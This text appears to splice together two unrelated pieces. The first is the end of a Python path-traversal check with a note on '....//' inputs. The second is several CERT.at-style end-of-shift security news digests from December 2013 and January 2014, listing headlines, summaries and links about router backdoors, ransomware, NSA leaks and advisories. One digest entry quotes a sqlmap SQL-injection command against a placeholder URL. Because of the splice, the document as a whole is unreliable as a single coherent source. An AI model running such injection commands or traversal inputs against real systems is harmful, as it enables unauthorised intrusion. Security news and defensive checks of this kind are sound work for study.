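        print(f"{req!r:>24} ->", "rejected" if is_rejected(public, req) else "allowed")
```

Note what the check deliberately does not do: it does not strip "../" from the input and carry on, because "....//" style inputs survive a single strip; it normalises and then asks whether the result is inside the allowed tree, which is the only question that matters.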
*** Vuln: Cisco Unified Communications Manager Unauthorized Access Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/bid/64690
*** HP 2620 Switch Series Cross-Site Request Forgery Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/56290
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 03-01-2014 18:00 − Tuesday 07-01-2014 18:00
Handler: Alexander Riepl
Co-Handler: Matthias Fraidl
*** Test your router for the backdoor ***
---------------------------------------------
The network equipment vendors are still keeping silent about the purpose of the recently discovered, undocumented router service. Here is how to find out whether your router is also waiting for commands.
---------------------------------------------
http://www.heise.de/security/meldung/Router-auf-Backdoor-testen-2074844.html
*** Backdoor in routers: vendors puzzle and analyse ***
---------------------------------------------
The router vendors still cannot offer a plausible explanation for why an undocumented configuration service is running on their devices. By their own account they are still busy with the analysis.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Backdoor-in-Routern-Hersteller-raets…
*** Distributions patch Drupal, except Ubuntu ***
---------------------------------------------
Debian and Fedora are shipping security updates for recently reported security problems in Drupal. Ubuntu users, however, have to take care of it themselves.
---------------------------------------------
http://www.heise.de/security/meldung/Distributionen-patchen-Drupal-ausser-U…
*** Recent Windows Zero-Day Targeted Embassies, Used Syria-related Email ***
---------------------------------------------
In late November, Microsoft revealed that a zero-day vulnerability was in use in targeted attacks against Windows XP and Server 2003 systems. From samples of the exploit examined, it has a backdoor payload that possesses sophisticated anti-analysis techniques. Further research of this earlier attack - discussed in the blog posts above - has revealed that the exploit was deployed via...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/xqgSESnrQns/
*** A Year of Spam: The Notable Trends of 2013 ***
---------------------------------------------
2013 was a year of change in the spam landscape. The volume of spam increased from 2012. We witnessed the decline of a previously successful exploit kit. The old became new again, thanks to different techniques used by spammers. While we still saw traditional types of spam, we also saw several "improvements" which allowed spammers to avoid...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/uZ0knuU7r3A/
*** Malware Deployed by Fake Digital Certificates Bypassing Endpoint Security ***
---------------------------------------------
Enterprises that place unwavering faith in the sanctity of digital certificates may want to re-think that belief, now that the latest chapter in the Win32/Winwebsec malware saga has revealed a troubling new development: the use of stolen authentication credentials. Win32/Winwebsec is the catch-all term used by Microsoft to reference a group of fake anti-virus programs [...]
---------------------------------------------
http://www.seculert.com/blog/2014/01/malware-deployed-by-fake-digital-certi…
*** Ransomware: Powerlocker offered for 100 US dollars ***
---------------------------------------------
The group Malware Crusaders warns of a new ransomware that not only encrypts better but is also equipped with additional functions. Powerlocker is already being offered for 100 US dollars in the relevant forums.
---------------------------------------------
http://www.golem.de/news/ransomware-powerlocker-wird-fuer-100-us-dollar-ang…
*** Malicious Advertisements served via Yahoo ***
---------------------------------------------
Fox-IT operates the shared Security Operations Center service ProtACT. This service monitors the networks of our clients for malicious activity. On January 3 we detected and investigated the infection of clients after they visited yahoo.com.
---------------------------------------------
http://blog.fox-it.com/2014/01/03/malicious-advertisements-served-via-yahoo/
*** WordPress Connect plugin for WordPress unspecified cross-site scripting ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/90106
*** Debian devscripts uscan.pl code execution ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/90107
*** [2013-12-27] XPath Injection in IBM Web Content Manager ***
---------------------------------------------
By exploiting the identified XPath Injection vulnerability, an unauthenticated user is able to extract sensitive application configuration data from vulnerable installations of IBM Web Content Manager.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2013…
*** HP Data Protector code execution ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/90001
http://xforce.iss.net/xforce/xfdb/90002
http://xforce.iss.net/xforce/xfdb/90003
=======================
= End-of-Shift report =
=======================
Timeframe: Donnerstag 02-01-2014 18:00 − Freitag 03-01-2014 18:00
Handler: Alexander Riepl
Co-Handler: L. Aaron Kaplan
*** Greyhats expose 4.5 million Snapchat phone numbers using 'theoretical' hack ***
---------------------------------------------
Snapchat largely discounted weakness that partially exposed user numbers.
---------------------------------------------
http://feeds.arstechnica.com/~r/arstechnica/security/~3/8aPSkYeU_SA/
*** Target's Use of 3DES Encryption Invites Scrutiny, Worry ***
---------------------------------------------
Target's admission that encrypted PIN data was stolen and secured with 3DES encryption has experts concerned because of the age of the algorithm and the availability of stronger options.
---------------------------------------------
http://threatpost.com/targets-use-of-3des-encryption-invites-scrutiny-worry…
*** Mysterious backdoor in various router models ***
---------------------------------------------
An undocumented service is listening on Linksys and Netgear routers, waiting for commands. So far there is only a single clue as to what it might be for.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Mysterioese-Backdoor-in-diversen-Rou…
*** Scans Increase for New Linksys Backdoor (32764/TCP), (Thu, Jan 2nd) ***
---------------------------------------------
We do see a lot of probes for port 32764/TCP. According to a post to github from 2 days ago, some Linksys devices may be listening on this port enabling full unauthenticated admin access. [1] At this point, I urge everybody to scan their networks for devices listening on port 32764/TCP. If you use a Linksys router, try to scan its public IP address from outside your network. Our data shows almost no scans to the port prior to today, but a large number from 3 source IPs today. The by far
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17336&rss
*** NSA Exploit of the Day: DEITYBOUNCE ***
---------------------------------------------
Today's item from the NSA's Tailored Access Operations (TAO) group implant catalog is DEITYBOUNCE: DEITYBOUNCE (TS//SI//REL) DEITYBOUNCE provides software application persistence on Dell PowerEdge servers by exploiting the motherboard BIOS and utilizing System Management Mode (SMM) to gain periodic execution while the Operating System loads. (TS//SI//REL) This technique supports multi-processor systems with RAID hardware and Microsoft Windows 2000, 2003, and...
---------------------------------------------
https://www.schneier.com/blog/archives/2014/01/nsa_exploit_of.html
*** Advanced Dewplayer plugin for WordPress download-file.php directory traversal ***
---------------------------------------------
Advanced Dewplayer plugin for WordPress download-file.php directory traversal
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/89978
*** "Penetrating Hard Targets": NSA working on quantum computers for cryptanalysis ***
---------------------------------------------
Documents from NSA whistleblower Edward Snowden suggest that the NSA has no lead in the development of quantum computers. Such technology could be used to break existing public-key cryptography.
---------------------------------------------
http://www.heise.de/security/meldung/Penetrating-Hard-Targets-NSA-arbeitet-…
*** HPSBMU02895 SSRT101253 rev.1 - HP Data Protector, Remote Increase of Privilege, Denial of Service (DoS), Execution of Arbitrary Code ***
---------------------------------------------
Potential security vulnerabilities have been identified with HP Data Protector. These vulnerabilities could be remotely exploited to allow an increase of privilege, create a Denial of Service (DoS), or execute arbitrary code.
---------------------------------------------
http://h20565.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDispl…
*** Bundesnetzagentur presents draft of the IT security catalogue ***
---------------------------------------------
A list of security requirements is intended to secure the IT infrastructure of our power grids. The draft is open for comments until February.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Bundesnetzagentur-praesentiert-Entwu…
*** Cost/Benefit Analysis of NSA's 215 Metadata Collection Program ***
---------------------------------------------
It has amazed me that the NSA doesn't seem to do any cost/benefit analyses on any of its surveillance programs. This seems particularly important for bulk surveillance programs, as they have significant costs aside from the obvious monetary costs. In this paper, John Mueller and Mark G. Stewart have done the analysis on one of these programs. Worth reading....
---------------------------------------------
https://www.schneier.com/blog/archives/2014/01/costbenefit_ana_1.html
*** UPDATED X1 : OpenSSL.org Defaced by Attackers Gaining Access to Hypervisor, (Thu, Jan 2nd) ***
---------------------------------------------
By now, most of you have heard that the openssl.org website was defaced. While the source code and repositories were not tampered with, this obviously concerned people. What is more interesting is that the attack was made possible by gaining access to the hypervisor that hosts the VM responsible for the website. Attacks of this sort are likely to be more common as time goes on as it provides easy ability to take over a host without having to go through the effort of actually rooting a box.
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17333&rss
*** ATMs taken over via USB stick ***
---------------------------------------------
Security researchers have discovered malicious code that is loaded onto ATMs via USB stick and then dispenses cash to crooks at will. The malware also contains sophisticated functions that give the people behind it control over the payouts.
---------------------------------------------
http://www.heise.de/security/meldung/Bankautomaten-per-USB-Stick-uebernomme…
*** Ubuntu patches up its TLSv1.2 support ***
---------------------------------------------
In current Ubuntu versions, the central crypto library OpenSSL cannot do TLSv1.2; that is only set to change with Ubuntu 14.04 LTS.
---------------------------------------------
http://www.heise.de/security/meldung/Ubuntu-bessert-TLSv1-2-Unterstuetzung-…
*** Surveillance: BND intercepts significantly less communication ***
---------------------------------------------
The Bundesnachrichtendienst has apparently improved its filtering methods. In 2012, far less suspicious communication content got caught in the nets than in previous years. (Data protection, DE-CIX)
---------------------------------------------
http://www.golem.de/news/ueberwachung-bnd-fischt-deutlich-weniger-kommunika…
*** Slovenian jailed for creating code behind 12 MILLION strong Mariposa botnet army ***
---------------------------------------------
A Slovenian virus writer who created an infamous strain of malware used to infect an estimated 12 million computers worldwide has been jailed for almost five years.
---------------------------------------------
http://www.theregister.co.uk/2014/01/03/mariposa_botnet_mastermind_jailed/
=======================
= End-of-Shift report =
=======================
Timeframe: Montag 30-12-2013 18:00 − Donnerstag 02-01-2014 18:00
Handler: L. Aaron Kaplan
Co-Handler: Stephan Richter
*** Joseph Stiglitz on Trust ***
---------------------------------------------
Joseph Stiglitz has an excellent essay on the value of trust, and the lack of it in today's society. Trust is what makes contracts, plans and everyday transactions possible; it facilitates the democratic process, from voting to law creation, and is necessary for social stability. It is essential for our lives. It is trust, more than money, that makes the...
---------------------------------------------
https://www.schneier.com/blog/archives/2013/12/joseph_stiglitz.html
*** Sqlmap Tricks for Advanced SQL Injection ***
---------------------------------------------
Sqlmap is an awesome tool that automates SQL Injection discovery and exploitation processes. I normally use it for exploitation only because I prefer manual detection in order to avoid stressing the web server or being blocked by IPS/WAF devices. Below I provide a basic overview of sqlmap and some configuration tweaks for finding trickier injection points. Basics Using sqlmap for classic SQLi is very straightforward: ./sqlmap.py -u http://mywebsite.com/page.php?vulnparam=hello The target URL...
---------------------------------------------
http://blog.spiderlabs.com/2013/12/sqlmap-tricks-for-advanced-sql-injection…
*** NSA Surveillance Has No Boundaries, Expert Says ***
---------------------------------------------
Expert Jacob Appelbaum's keynote at CCC describes the deep catalog of hacks and backdoors at the NSA's disposal.
---------------------------------------------
http://threatpost.com/nsa-surveillance-has-no-boundaries-expert-says/103355
*** Protecting the data about data ***
---------------------------------------------
It has been said that encryption simply trades one secret (the data) for another (the key). In the same way, encrypting data naturally shifts attention to that which is not protected: the metadata.
---------------------------------------------
http://www.scmagazine.com//protecting-the-data-about-data/article/327122/
*** Yes, the BBC still uses FTP. And yes, a Russian crook hacked the server ***
---------------------------------------------
Convenient file-store a convenient target for crook touting access. A BBC FTP server, ftp.bbc.co.uk, was compromised by a Russian hacker and access to it touted online, say computer security researchers.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2013/12/30/bbc_ftp_ser…
*** Why NSA spied on inexplicably unencrypted Windows crash reports ***
---------------------------------------------
Windows reports what hardware you have and what software doesn't work.
---------------------------------------------
http://feeds.arstechnica.com/~r/arstechnica/security/~3/CCjtHJ8WSwY/
*** 30C3: Security nightmares of the year 2014 ***
---------------------------------------------
In the view of CCC security experts, unmodulated baseband systems are worthwhile attack targets. In the biometrics segment, Apple has opened "Pandora's box" with Touch ID.
---------------------------------------------
http://www.heise.de/newsticker/meldung/30C3-Sicherheitsalbtraeume-des-Jahre…
*** Juniper SSL VPN and UAC Host Checker Issue, (Tue, Dec 31st) ***
---------------------------------------------
A few readers have written asking about odd denials when trying to use Juniper VPNs. Turns out they released a Product Support Notification (subscription required) about their host check feature which fails on endpoints that have a local date set to 12/31/2013 or later. They are working on a fix but as a workaround, you can change the local date on the PC, disable host checker verification altogether or create a manual host checker process that disables checking firewall, anti-virus and/or
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17321&rss
*** X11/X.Org Security In Bad Shape ***
---------------------------------------------
An anonymous reader writes "A presentation at the Chaos Communication Congress explains how X11 Server security is worse than it looks. The presenter found more than 120 bugs in a few months of security research and is not close to being done in his work. Upstream X.Org developers have begun to call most of his claims valid. The presentation by Ilja van Sprundel is available for streaming."
---------------------------------------------
http://rss.slashdot.org/~r/Slashdot/slashdot/~3/W_cx3sKOALE/story01.htm
*** Administrators! Do crypto, but better... ***
---------------------------------------------
Bettercrypto helps sysadmins set up and improve encryption. Copy & paste is welcome, and so are suggestions for improvement.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Administratoren-Machet-Krypto-aber-b…
*** Dual_EC_DRBG Backdoor: a Proof of Concept ***
---------------------------------------------
New submitter Reliable Windmill sends this followup to the report that RSA took money from the NSA to use backdoored tech for random number generation in encryption software. From the article: "Dual_EC_DRBG is a pseudo-random number generator promoted by NIST in NIST SP 800-90A and created by NSA. This algorithm is problematic because it has been made mandatory by the FIPS norm (and should be implemented in every FIPS approved software) and some vendors even promoted this algorithm as...
---------------------------------------------
http://rss.slashdot.org/~r/Slashdot/slashdot/~3/_PXJ0M1qmQI/story01.htm
*** Hackers find backdoors in Netgear and Linksys routers ***
---------------------------------------------
In recent days, a resourceful hacker discovered a strange background service on his router. Through it, anyone can gain access to his network.
---------------------------------------------
http://futurezone.at/netzpolitik/hacker-finden-hintertueren-in-netgear-und-…
*** Austrian Begeh: Copyability of RFID keys known ***
---------------------------------------------
The company has taken a position following Adrian Dabrowski's 30C3 talk.
---------------------------------------------
http://derstandard.at/1388649760468
*** Manipulated memory cards as a malware hiding place ***
---------------------------------------------
Hackers demonstrate an attack against the embedded microcontroller - data can be hidden from the operating system.
---------------------------------------------
http://derstandard.at/1388649791611
*** Snapchat silent after data leak ***
---------------------------------------------
The provider of the photo app Snapchat has so far not commented on the incident in which unknown parties captured the data of 4.6 million customers. The company had previously dismissed warnings from security experts.
---------------------------------------------
http://www.heise.de/security/meldung/Snapchat-schweigt-nach-Datenleck-20742…
*** memcached with leaky authentication ***
---------------------------------------------
The cache server's SASL authentication is too lenient. Even with invalid credentials, you get in on the second attempt.
---------------------------------------------
http://www.heise.de/security/meldung/memcached-mit-loechriger-Authentifizie…
*** OpenSSL.org Defaced by Attackers Gaining Access to Hypervisor, (Thu, Jan 2nd) ***
---------------------------------------------
By now, most of you have heard that the openssl.org website was defaced. While the source code and repositories were not tampered with, this obviously concerned people. What is more interesting is that the attack was made possible by gaining access to the hypervisor that hosts the VM responsible for the website. Attacks of this sort are likely to be more common as time goes on as it provides easy ability to take over a host without having to go through the effort of actually rooting a box.
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17333&rss
*** Der Spiegel Article on Networking Equipment Infiltration ***
---------------------------------------------
On December 29, 2013, the German news publication Der Spiegel published an article referencing leaked documents from the U.S. National Security Agency (NSA) that mentioned "software implants" for networking devices. Cisco is one of a number of technology companies mentioned in the article...
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-…
*** Security Notice-Statement About the Networking Equipment Infiltration Article in Der Spiegel ***
---------------------------------------------
On December 29, 2013, German news agency Der Spiegel published a report titled "Shopping for Spy Gear: Catalog Advertises NSA Toolbox" and described Huawei as one of the vendors that might be impacted.
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-notices…
*** Security Advisory-A DoS Vulnerability in the SSH Module on Huawei AR Router ***
---------------------------------------------
On some Huawei AR routers that receive a large number of SSH authentication attack packets with malformed data, legitimate users fail to log in through SSH. Attackers can construct massive numbers of attack packets to cause the AR routers to deny SSH login to legitimate users. (HWPSIRT-2013-1255).
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor…
*** Vuln: mod_nss Module NSSVerifyClient CVE-2013-4566 Authentication Bypass Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/bid/64114
*** Vuln: libgadu SSL Certificate Validation CVE-2013-4488 Security Bypass Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/bid/63473
*** Debian update for ruby-i18n ***
---------------------------------------------
https://secunia.com/advisories/56212
*** DSA-2833 openssl ***
---------------------------------------------
several vulnerabilities
---------------------------------------------
http://www.debian.org/security/2014/dsa-2833
*** DSA-2832 memcached ***
---------------------------------------------
several vulnerabilities
---------------------------------------------
http://www.debian.org/security/2014/dsa-2832
*** DSA-2831 puppet ***
---------------------------------------------
insecure temporary files
---------------------------------------------
http://www.debian.org/security/2013/dsa-2831
*** Debian update for typo3-src ***
---------------------------------------------
https://secunia.com/advisories/56266
=======================
= End-of-Shift report =
=======================
Timeframe: Freitag 27-12-2013 18:00 − Montag 30-12-2013 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** eBay Vulnerable to Account Hijacking Via XSRF ***
---------------------------------------------
A researcher reported a cross-site request forgery vulnerability to eBay in August, and despite repeated communication from the online auction that the code has been repaired, the site remains vulnerable to exploit.
---------------------------------------------
http://threatpost.com/ebay-vulnerable-to-account-hijacking-via-xsrf/103311
*** 12 Days of HaXmas: Meterpreter, Reloaded ***
---------------------------------------------
Over the last quarter of 2013, we here in the Democratic Freehold of Metasploit found that we needed to modernize our flagship remote access toolkit (RAT), Meterpreter. That started with cleaving Meterpreter out of the main Metasploit repository and setting it up with its own repository, and then bringing in a dedicated Meterpreter hacker, the indomitable OJ TheColonial Reeves. We couldn't be happier with the results so far.
---------------------------------------------
https://community.rapid7.com/community/metasploit/blog/2013/12/27/meterpret…
*** 12 Days of HaXmas: Exploiting (and Fixing) RJS Rails Info Leaks ***
---------------------------------------------
Several weeks ago, Egor Homakov wrote a blog post pointing out a common info leak vulnerability in many Rails apps that utilize Remote JavaScript. The attack vector and implications can be hard to wrap your head around, so in this post I'll explain how the vulnerability occurs and how to exploit it.
---------------------------------------------
https://community.rapid7.com/community/metasploit/blog/2013/12/29/remote-js…
*** Major flaw discovered in mobile software used by govt agencies ***
---------------------------------------------
The vulnerability discovered by an Israeli security researcher affects Samsung's Galaxy S4 device, which is currently used by government agencies.
---------------------------------------------
http://www.scmagazine.com/major-flaw-discovered-in-mobile-software-used-by-…
*** Who's Still Robbing ATMs with USB Sticks? ***
---------------------------------------------
Here's one quick way to rob a bank, over and over again. Find an ATM running Windows XP. Skeptical? Don't be, they're still installed all around the world. Next, cut a piece from its chassis to expose its USB port. ...
---------------------------------------------
http://www.wired.com/threatlevel/2013/12/whos-robbing-atms-usb-stick/
*** NTP reflection attack, (Fri, Dec 27th) ***
---------------------------------------------
Symantec has noticed in the last few weeks that there are significant NTP reflection attacks. NTP is the Network Time Protocol and it's used to sync the time between client and server; it is a UDP protocol and it runs on port 123. In the NTP reflection attack the attacker sends a crafted packet which requests a large amount of data be sent to the host. "In this case, the attackers are taking advantage of the monlist command. Monlist is a remote command in older version of NTP that...
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17300
*** DRG online challenge(s), (Sat, Dec 28th) ***
---------------------------------------------
For the last couple of months DRG (the Dragon Research Group) has posted some interesting security challenges. The last one, for December, is currently online so if you want to test your security skills - and post the solutions for the public benefit, do not miss the current challenge available at http://dragonresearchgroup.org/challenges/201312/ Those of you who like playing CTFs will enjoy this. Other (older) challenges are still online too, so if you have some time off here's...
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17306
*** 30C3: No backdoors in Tor ***
---------------------------------------------
Roger Dingledine, father of the Tor network, stated at the Hamburg hacker congress that a representative of the US Department of Justice had pushed for the anonymization service to be made easier to monitor.
---------------------------------------------
http://www.heise.de/security/meldung/30C3-Keine-Hintertueren-in-Tor-2072708…
*** The story of a Trojan Dropper I ***
---------------------------------------------
Introduction: Recently, Zscaler ThreatlabZ received a suspicious file from one of our customers, which was named "OrderDetails.zip". After extracting the executable file from the archive I have performed a virustotal scan to get some information about the file. At that time, very few antivirus vendors had definitions in place, which flagged the file as malicious. As such, I decided...
---------------------------------------------
http://research.zscaler.com/2013/12/the-story-of-trojan-dropper-i.html
*** The story of a Trojan dropper II ***
---------------------------------------------
Analysis: Let's analyze the PE file in detail and see what it's up to. Like most malware, this sample was packed and in order to properly analyze it, we must begin by unpacking the binary. Keeping this in mind, I began by debugging the file, hoping to find the reference to the data section in order to determine precisely where the encrypted portion of data was to be found. Fortunately,...
---------------------------------------------
http://research.zscaler.com/2013/12/the-story-of-trojan-dropper-ii.html
*** RFID Begehcard: Into Vienna's apartment buildings with a ski pass ***
---------------------------------------------
"Austria is safe", the Begeh system's website boldly proclaims. But buildings that secure their entrance with the Begehcard are easy to open. All it takes is a re-programmable RFID ski pass. (RFID, security vulnerability)
---------------------------------------------
http://www.golem.de/news/rfid-begehcard-ohne-sicherheit-mit-dem-skipass-in-…
*** Open-Source Release of MANTIS Cyber-Threat Intelligence Management Framework ***
---------------------------------------------
Today, Siemens CERT is releasing the "MANTIS Cyber-Threat Intelligence Management Framework" as Open Source under GPL2+.
---------------------------------------------
http://making-security-measurable.1364806.n2.nabble.com/Open-Source-Release…
*** The Year in NSA ***
---------------------------------------------
It's that most wonderful time of the year, the time when everyone with access to an email machine puts together a list of the best or worst of whatever happened in the last 12 months. In the computer security world, there is no doubt that such a list would find NSA stories in places one...
---------------------------------------------
http://threatpost.com/the-year-in-nsa/103329
*** PIN Skimmer offers a new side channel attack against mobile devices ***
---------------------------------------------
Researchers with the University of Cambridge revealed just how effective PIN Skimmers can be against mobile devices in a recently released study on the new type of side-channel attack.
---------------------------------------------
http://www.scmagazine.com/pin-skimmer-offers-a-new-side-channel-attack-agai…
*** HP Application Information Optimizer Flaw in Archive Query Server Lets Remote Users Execute Arbitrary Code ***
---------------------------------------------
http://www.securitytracker.com/id/1029542
*** HP Service Manager Input Validation Hole Permits Cross-Site Scripting Attacks ***
---------------------------------------------
http://www.securitytracker.com/id/1029541
*** HPSBMU02959 rev.1 - HP Service Manager WebTier and Windows Client, Cross-Site Scripting (XSS), Execution of Arbitrary Code and other Vulnerabilities ***
---------------------------------------------
Potential security vulnerabilities have been identified with HP Service Manager WebTier and Windows Client. The vulnerabilities could be remotely exploited including cross-site scripting (XSS) and execution of arbitrary code.
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
*** DSA-2828 drupal6 ***
---------------------------------------------
several vulnerabilities
---------------------------------------------
http://www.debian.org/security/2013/dsa-2828
Next End-of-Shift Report on 2014-01-02
=======================
= End-of-Shift report =
=======================
Timeframe: Montag 23-12-2013 18:00 − Freitag 27-12-2013 18:00
Handler: Matthias Fraidl
Co-Handler: n/a
*** Background: Successful attack on Linux encryption ***
---------------------------------------------
Linux Unified Key Setup (LUKS) is the standard method for full-disk encryption under Linux; many systems, including Ubuntu 12.04 LTS, use LUKS in CBC mode. Jakob Lell demonstrates that this combination is vulnerable to the injection of a backdoor.
---------------------------------------------
http://www.heise.de/security/artikel/Erfolgreicher-Angriff-auf-Linux-Versch…
*** Protection metrics - November results ***
---------------------------------------------
In our October results, we talked about a trio of families related to Win32/Sefnit. Our November results showed progress against Sefnit and the installers and downloaders of Sefnit (Win32/Rotbrow and Win32/Brantall). In comparison to September, active Sefnit infections have been reduced by 82 percent. As with prior months, our rate of incorrect detections also remained low and performance stayed consistent.
---------------------------------------------
http://blogs.technet.com/b/mmpc/archive/2013/12/23/protection-metrics-novem…
*** Turkey: Understanding high malware encounter rates in SIRv15 ***
---------------------------------------------
In our most recent version of the Security Intelligence Report, we compared the encounter rates of malware categories for the top 10 countries with computers reporting the most detections in 2Q13. Amongst these countries, Turkey stood out with considerably high encounter rates in multiple categories. Encounter rate is the percentage of computers in a country that reported at least one detection of malware.
---------------------------------------------
http://blogs.technet.com/b/mmpc/archive/2013/12/23/turkey-understanding-hig…
*** Popular Registrar Namecheap Fixes DNS Hijack Bug ***
---------------------------------------------
The domain registrar and Web-hosting company Namecheap has fixed a cross site request forgery vulnerability in its DNS setup page.
---------------------------------------------
http://threatpost.com/popular-registrar-namecheap-fixes-dns-hijack-bug/1032…
*** What a successful exploit of a Linux server looks like ***
---------------------------------------------
Like most mainstream operating systems these days, fully patched installations of Linux provide a level of security that requires a fair amount of malicious hacking to overcome. Those assurances can be completely undone by a single unpatched application, as Andre' DiMino has demonstrated when he documented an Ubuntu machine in his lab being converted into a Bitcoin-mining, denial-of-service-spewing, vulnerability-exploiting hostage under the control of attackers.
---------------------------------------------
http://arstechnica.com/security/2013/12/anatomy-of-a-hack-what-a-successful…
*** Turkey Tops World in Per Capita Malware Encounters ***
---------------------------------------------
Microsoft claims that Turkish machines encounter more malware than computers in any other country in the world.
---------------------------------------------
http://threatpost.com/turkey-tops-world-in-per-capita-malware-encounters/10…
*** New Trojan.Mods mines bitcoins ***
---------------------------------------------
Russian anti-virus company Doctor Web is warning users about a new Trojan.Mods modification that has been dubbed Trojan.Mods.10. This Trojan's authors followed the major trend of December 2013 and added a bitcoin miner to the set of Trojan.Mods.10's features. You may recall that Trojan.Mods programs were found in large numbers in the wild in spring 2013 and were primarily designed to intercept browsers' DNS queries and redirect users to malignant sites.
---------------------------------------------
http://news.drweb.com/show/?i=4176&lng=en&c=9
*** New CryptoLocker Spreads Via Removable Drives ***
---------------------------------------------
We recently came across a CryptoLocker variant that had one notable feature - it has propagation routines.
Analysis of the malware, detected as WORM_CRILOCK.A, shows that this malware can spread via removable drives. This update is considered significant because this routine was unheard of in other CRILOCK variants.
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/new-cryptolocker…
*** OpenSSL with a broken backdoor ***
---------------------------------------------
The random number function Dual EC, designed by the NSA as a backdoor, is also found in the open crypto library OpenSSL. However, it was non-functional there without anyone noticing.
---------------------------------------------
http://www.heise.de/security/meldung/OpenSSL-mit-kaputter-Hintertuer-207237…
*** Big Data and security analytics collide ***
---------------------------------------------
Big Data will become "The next big thing" - a critical re-evaluation and re-tooling of our analytical abilities. This is not about being able to query more data, but being able to query all data.
---------------------------------------------
http://www.scmagazine.com/big-data-and-security-analytics-collide/article/3…
*** Infection found on "feedburner.com" ***
---------------------------------------------
Recently we have seen the websites of MySQL and PHP.net being compromised. We have also blogged about Google Code being used as a drop site for holding malicious code. These instances clearly suggest that attackers are targeting popular websites and using them in their attacks, as such sites are less likely to be blocked by URL filters. This time we found that Google-acquired "FeedBurner", which provides custom RSS feeds and management tools to users, is hosting an infected page.
---------------------------------------------
http://research.zscaler.com/2013/12/infection-found-on-feedburnercom.html
*** Hackers who breached php.net exposed visitors to highly unusual malware ***
---------------------------------------------
Eight weeks after hackers compromised the official PHP website and laced it with attack code, outside security researchers have uncovered evidence that some visitors were exposed to malware that's highly unusual, if not unique.
---------------------------------------------
http://arstechnica.com/security/2013/12/hackers-who-breached-php-net-expose…
*** Python Multiple Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/56234
*** Puppet Enterprise Multiple Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/56251
*** Novell Client Bug Lets Local Users Crash the System ***
---------------------------------------------
http://www.securitytracker.com/id/1029533
*** Cisco IOS XE VTY Authentication security bypass ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/89901
*** cPanel WHM XML and JSON APIs Arbitrary File Disclosure Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/56207
*** VMware Patches Privilege Vulnerability in ESX, ESXi ***
---------------------------------------------
http://threatpost.com/vmware-patches-privilege-vulnerability-in-esx-esxi/10…
*** Zimbra 8.0.2 and 7.2.2 Collaboration Server LFI Exploit ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2013120155
*** Synology DiskStation Manager SLICEUPLOAD Remote Command Execution ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2013120156
*** RT: Request Tracker 4.0.10 SQL Injection ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2013040083
*** Bugtraq: Song Exporter v2.1.1 RS iOS - File Include Vulnerabilities ***
---------------------------------------------
http://www.securityfocus.com/archive/1/530489
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 20-12-2013 18:00 − Monday 23-12-2013 18:00
Handler: L. Aaron Kaplan
Co-Handler: Stephan Richter
*** What to Expect in Surveillance Politics in 2014 (Hint: It's Not Reform) ***
---------------------------------------------
You would think that a federal district judge calling the NSA program almost Orwellian would be a good sign for surveillance and privacy in 2014. If you're holding out hope for an act of political courage to end bulk surveillance ...
---------------------------------------------
http://www.wired.com/opinion/2013/12/dont-get-too-excited-about-recent-ruli…
*** DHS Turns To Unpaid Interns For Nation's Cyber Security ***
---------------------------------------------
theodp writes "A week after President Obama stressed the importance of computer science to America, the Department of Homeland Security put out a call for 100+ of the nation's best-and-brightest college students to work for nothing on the nation's cyber security. The unpaid internship program, DHS notes, is the realization of recommendations (PDF) from the Homeland Security Advisory Council's Task Force on CyberSkills, which included execs from Facebook, Lockheed Martin, and Sony, and was...
---------------------------------------------
http://rss.slashdot.org/~r/Slashdot/slashdot/~3/leJ5tNqGbgU/story01.htm
*** Microsoft Security Essentials Misses 39% of Malware ***
---------------------------------------------
Barence writes "The latest tests from Dennis Publishing's security labs saw Microsoft Security Essentials fail to detect 39% of the real-world malware thrown at it. Dennis Technology Labs (DTL) tested nine home security products on a Windows 7 PC, including Security Essentials, which is distributed free to Windows users and built into Windows 8 in the form of Windows Defender. While the other eight packages all achieved protection scores of 87% or higher - with five scoring 98% or 99%...
---------------------------------------------
http://rss.slashdot.org/~r/Slashdot/slashdot/~3/8Vg-UHP2dqo/story01.htm
*** Critical security vulnerabilities discovered in write blocker ***
---------------------------------------------
An IT forensics expert discovered several security vulnerabilities in the new write blocker Ditto. The consequence: instead of doing its actual job, the device itself can be abused as an attack tool and sabotage investigations.
---------------------------------------------
http://www.heise.de/security/meldung/Kritische-Sicherheitsluecken-in-Write-…
